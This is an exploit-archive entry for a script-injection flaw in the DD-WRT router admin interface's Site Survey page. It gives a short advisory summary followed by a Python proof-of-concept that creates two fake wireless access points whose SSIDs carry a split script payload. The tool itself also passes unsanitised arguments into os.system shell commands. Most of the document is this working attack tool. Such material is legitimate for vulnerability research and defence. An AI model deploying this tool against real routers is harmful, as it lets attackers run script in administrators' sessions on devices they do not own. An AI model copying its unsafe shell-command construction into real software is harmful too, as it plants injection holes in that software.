DD-WRT - Site Survey SSID Script Injection

source: https://www.securityfocus.com/bid/30573/info

DD-WRT is prone to a script-injection vulnerability because it fails to adequately sanitize user-supplied data to the 'Site Survey' section of the administrative web interface.

Attackers can exploit this issue to execute arbitrary script code in the DD-WRT web interface.

Versions prior to DD-WRT 24-sp1 are vulnerable. 

#!/usr/bin/env python
# 
# This tool is distributed under a BSD licence. A copy of this 
# should have been included with this file.
#
# Copyright (c) 2008, Rafael Dominguez Vega.
#
# This tool is designed for the purpose of performing security 
# testing only and is not intended to be used for unlawful 
# activities.
#
# This tool can be used to check for SSID script injection 
vulnerabilities 
# in different sofware products.
# 
# Help can be viewed by running this file with --help. 
# 
#
# Author: Rafael Dominguez Vega
# Version: 0.0.2
#
# Further information: rafael ({dot}) dominguez-vega <(at)> 
mwrinfosecurity {(dot)} com
#

import optparse
import sys
import os
import time
from optparse import OptionParser

class OptionParser (optparse.OptionParser):

    def check_required (self, opt):
        option = self.get_option(opt)

        if getattr(self.values, option.dest) is None:
            self.error("%s option not supplied" % option)

parser = OptionParser()
parser.add_option("-i", "--interface1", action="store", 
dest="ap1",help="Network interface for first Access Point (required)")
parser.add_option("-j", "--interface2", action="store", dest="ap2", 
help="Network interface for second Access Point (required)")
parser.add_option("-s", "--ssid1", action="store", dest="ssid1",  
help="SSID for first Access Point.  Between double quotes (\"\") if 
special characters are used (required)")
parser.add_option("-t", "--ssid2", action="store", dest="ssid2", 
help="SSID for second Access Point.  Between double quotes (\"\") if 
special characters are used (required)")

(options, args) = parser.parse_args()

parser.check_required("-i")
if options.ap1:
    ap1 = options.ap1
else:
    sys.exit(0)
    
parser.check_required("-j")
if options.ap2:
    ap2 = options.ap2
else:
    sys.exit(0)
    
parser.check_required("-s")
if options.ssid1:
    ssid1 = options.ssid1
else:
    sys.exit(0)
    
parser.check_required("-t")
if options.ssid2:
    ssid2 = options.ssid2
else:
    sys.exit(0)



ssid1 = ssid1.replace("<", "\<")
ssid1 = ssid1.replace(">","\>")
ssid1 = ssid1.replace("(","\(")
ssid1 = ssid1.replace(")","\)")
ssid1 = ssid1.replace("$","\$")
ssid1 = ssid1.replace("&","\&")
ssid1 = ssid1.replace(";","\;")
ssid1 = ssid1.replace("|","\|")
ssid1 = ssid1.replace("*","\*")
ssid1 = ssid1.replace(" ","\ ")

ssid2 = ssid2.replace("<", "\<")
ssid2 = ssid2.replace(">","\>")
ssid2 = ssid2.replace("(","\(")
ssid2 = ssid2.replace(")","\)")
ssid2 = ssid2.replace("$","\$")
ssid2 = ssid2.replace("&","\&")
ssid2 = ssid2.replace(";","\;")
ssid2 = ssid2.replace("|","\|")
ssid2 = ssid2.replace("*","\*")
ssid2 = ssid2.replace(" ","\ ")


os.system("wlanconfig "+ap1+" destroy")
os.system("wlanconfig "+ap2+" destroy")
print("\n Initialising fake APs...\n")

os.system("wlanconfig "+ap1+" create wlandev wifi0 wlanmode ap bssid")
time.sleep(3)
os.system("iwconfig "+ap1+" essid "+ssid1)
time.sleep(2)
os.system("wlanconfig "+ap2+" create wlandev wifi0 wlanmode ap bssid")
time.sleep(3)
os.system("iwconfig "+ap2+" essid "+ssid2)

print("Payload: "+ssid1+ssid2)